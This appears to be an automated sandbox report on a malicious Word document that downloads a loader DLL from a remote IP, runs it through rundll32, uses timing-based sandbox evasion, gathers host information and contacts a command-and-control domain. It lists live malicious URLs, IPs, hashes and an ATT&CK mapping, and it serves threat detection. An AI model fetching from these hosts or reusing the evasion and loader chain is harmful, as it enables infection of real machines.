Source: dodsonimaging,file,08.11.2022.doc | OLE document summary: edited time not present or 0
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE document summary: title field not present or empty
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE document summary: author field not present or empty
Source: ~DF4786325F45128C5F.TMP.0.dr | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: dodsonimaging,file,08.11.2022.doc | Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: dodsonimaging,file,08.11.2022.doc | Static file information: File size 2298458 > 1048576
Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Code function: 4_2_000419CA push ecx; ret 4_2_000419DD
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000007FEF74D8BC2 push rax; ret 5_2_000007FEF74D8BDE
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000007FEF74D610E push rdx; ret 5_2_000007FEF74D611B
Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr | Static PE information: real checksum: 0x59d91 should be: 0x5f194
Source: y84FE.tmp.dll.0.dr | Static PE information: real checksum: 0x59d91 should be: 0x5f194
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe | RDTSC instruction interceptor: First address: 0000000180002AE1, second address: 0000000180002B06, instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\rundll32.exe | RDTSC instruction interceptor: First address: 0000000180002B1B, second address: 0000000180002B28, instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_0000000180002AC0 SwitchToThread,SwitchToThread,5_2_0000000180002AC0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
Source: C:\Windows\System32\rundll32.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000133C
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0000000180001C28
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Code function: 4_2_00041189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00041189

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe | Network Connect: 64.227.108.27 80
Source: C:\Windows\System32\rundll32.exe | Domain query: alexbionka.com
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | Code function: 4_2_00041593 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_00041593
Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,5_2_0000000180002018

      Stealing of Sensitive Information

Source: Yara match | File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match | File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

      Remote Access Functionality

Source: Yara match | File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match | File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Command and Scripting Interpreter
      Path Interception111
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium2
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts12
      Scripting
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools
      LSASS Memory22
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth14
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Native API
      Logon Script (Windows)Logon Script (Windows)111
      Process Injection
      Security Account Manager1
      Account Discovery
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts33
      Exploitation for Client Execution
      Logon Script (Mac)Logon Script (Mac)12
      Scripting
      NTDS1
      System Owner/User Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer123
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets1
      Remote System Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Rundll32
      Cached Domain Credentials1
      System Network Configuration Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      File and Directory Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
      System Information Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

Source | Detection | Scanner | Label
dodsonimaging,file,08.11.2022.doc | 26% | Virustotal
dodsonimaging,file,08.11.2022.doc | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll | 100% | Avira | HEUR/AGEN.1251556
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll | 100% | Avira | HEUR/AGEN.1251556
C:\Users\user\AppData\Local\Temp\~DF4786325F45128C5F.TMP | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe | 0% | ReversingLabs
Source | Detection | Scanner | Label
5.2.rundll32.exe.180000000.1.unpack | 100% | Avira | HEUR/AGEN.1205098
5.2.rundll32.exe.7fef74d0000.2.unpack | 100% | Avira | HEUR/AGEN.1251556
No Antivirus matches
Source | Detection | Scanner | Label
alexbionka.com | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma | 0% | Avira URL Cloud | safe
http://alexbionka.com/ | 0% | Avira URL Cloud | safe
http://45.8.146 | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm& | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT& | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO651 | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj | 0% | Avira URL Cloud | safe
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv& | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
alexbionka.com | 64.227.108.27 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
alexbionka.com | true | Avira URL Cloud: safe | unknown
http://alexbionka.com/ | true | Avira URL Cloud: safe | unknown
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma | r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.8.146 | rundll32.exe, 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm& | r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm | rundll32.exe, 00000005.00000002.946524016.0000000000420000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli | r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT& | r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.8.146.139/fhfty/O-M--V4GO651 | r8F8A.tmp.exe, 00000004.00000002.947212998.0000000000544000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj | r8F8A.tmp.exe, 00000004.00000002.947197812.0000000000360000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv& | r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
45.8.146.139 | unknown | Russian Federation | 44676 | VMAGE-ASRU | false
64.227.108.27 | alexbionka.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 682555
Start date and time: 2022-08-11 17:26:52 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 25s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: dodsonimaging,file,08.11.2022.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • GSI enabled (VBA)
        • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@5/14@2/2
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 57.5% (good quality ratio 39.1%)
        • Quality average: 51.4%
        • Quality standard deviation: 40.7%
        HCA Information:
        • Successful, ratio: 97%
        • Number of executed functions: 28
        • Number of non-executed functions: 23
        Cookbook Comments:
        • Found application associated with file extension: .doc
        • Adjust boot time
        • Enable AMSI
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe
        • Report size getting too big, too many NtQueryAttributesFile calls found.
Time | Type | Description
17:27:36 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
Match | Associated Sample Name / URL | Detection | Context
Match: 45.8.146.139
• feltenberger doc 08.11.doc | malicious | context: 45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
• agsilverfile08.11.doc | malicious | context: 45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll
Match: 64.227.108.27
• aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dll | malicious | context: alexbionka.com/
• 9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dll | malicious | context: alexbionka.com/
• feltenberger doc 08.11.doc | malicious | context: alexbionka.com/
• agsilverfile08.11.doc | malicious | context: alexbionka.com/
• giveThereWhichCouldHis.dll | malicious | context: qropalhouse.com/
Match | Associated Sample Name / URL | Detection | Context
Match: alexbionka.com
• aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dll | malicious | context: 64.227.108.27
• 9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dll | malicious | context: 64.227.108.27
• feltenberger doc 08.11.doc | malicious | context: 64.227.108.27
• agsilverfile08.11.doc | malicious | context: 64.227.108.27
Match | Associated Sample Name / URL | Detection | Context
Match: VMAGE-ASRU
• feltenberger doc 08.11.doc | malicious | context: 45.8.146.139
• agsilverfile08.11.doc | malicious | context: 45.8.146.139
• GitmEGG60Q.exe | malicious | context: 45.159.251.68
• 80J4pAFU0A.exe | malicious | context: 45.159.248.53
• Rwwsr82vkS.exe | malicious | context: 45.159.248.53
• sJq1pykxns.exe | malicious | context: 45.159.248.53
• 3RkGCbnoKw.exe | malicious | context: 45.159.248.53
• 60MLnq8Uma.exe | malicious | context: 45.159.248.53
• uGfpJynSWM.exe | malicious | context: 45.159.249.4
• MqYQkpHt4V.exe | malicious | context: 45.159.248.53
• 0LYwkmJsgj.exe | malicious | context: 45.159.248.53
• P5u1ZAL6wF.exe | malicious | context: 45.159.248.53
• VbeTpPMvvK.exe | malicious | context: 45.159.248.53
• e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exe | malicious | context: 45.159.248.53
• aTlGCwT504.exe | malicious | context: 45.159.248.53
• a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exe | malicious | context: 45.159.248.53
• lFqE59erhf.exe | malicious | context: 45.8.144.151
• eW9zvrPzHg.exe | malicious | context: 45.159.251.105
• spotify premium crack download 2022.exe | malicious | context: 45.159.249.4
• jh6gyqcWFO.exe | malicious | context: 45.159.249.5
        No context
Match | Associated Sample Name / URL | Detection | Context
Match: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
• feltenberger doc 08.11.doc | malicious
• agsilverfile08.11.doc | malicious
• ino.file.18.07.2022.doc | malicious
• md-srl.doc.29.07.22.doc | malicious
• [redacted]-document-26.07.22.doc | malicious
• [redacted]-doc-26.07.doc | malicious
• confinalp.file.26.07.22.doc | malicious
• alhena-doc-26.07.2022.doc | malicious
• andreademarchi invoice 26.07.22.doc | malicious
• technographsri invoice 26.07.2022.doc | malicious
• 377155250.doc | malicious
• pelagagge_doc_22.07.22.doc | malicious
• 12658371_dynamicom-invoice-18.07.22.doc | malicious
• [redacted],file,18.07.doc | malicious
• istitutomargherita.file.18.07.doc | malicious
• gruppobluecity invoice 18.07.22.doc | malicious
• bbdy_document_07.06.2022.doc | malicious
• tcrc-central-le file 07.01.22.doc | malicious
• ida,file,07.01.2022.doc | malicious
• gol document 07.01.2022.doc | malicious
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: downloaded
Size (bytes): 360448
Entropy (8bit): 4.669605444265748
Encrypted: false
SSDEEP: 6144:4YCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:/CwMfjSlE+A4eguRJDtPZIG46FkEH9
MD5: 18CC94DD7BBBFF54DF547A4F47346F01
SHA1: B13786283F076A3E95BEDF277C4AD5CCF74D407E
SHA-256: 2FFB609277439F8D2F4E2716C54F282030BA717A59234098F364205BCF37FE9C
SHA-512: 798FB93688E812ED1AC854B9B4CF93E2A5BD5A3602CFED7F266B64526480A2102527C310513726800F6390D47E3F37444C0B4E90945B92EA73A6FA13328E5B67
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
Reputation: low
IE Cache URL: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 256043
Entropy (8bit): 7.978649843052502
Encrypted: false
SSDEEP: 3072:oHOxTlIBnmM5ZwN3oWcuwnPlWUHeMlJ3NsT51XIcxe38wh06q6vOYgMC4Gy0HBZ8:5TJ+K2P5lmDICe38wi6vrgLRiw981
MD5: D3341817BB7485FA43E737DDCCFCDA50
SHA1: B14836FF62F326C98E26218754BBFE85DBA7A654
SHA-256: A2482A832CC317A2D773F9FCDFCF843ED8E84597F9B382DB0420DC5578D56943
SHA-512: AE51BACA31BAFD99D370531AD8E2E92EF4B38AACAF8E2684E9D23BDB8C0E85D23E2CDED482D314A30C364D5F6071D9B7F8E61D98656A8532C56409906B2AB920
Malicious: false
Reputation: low
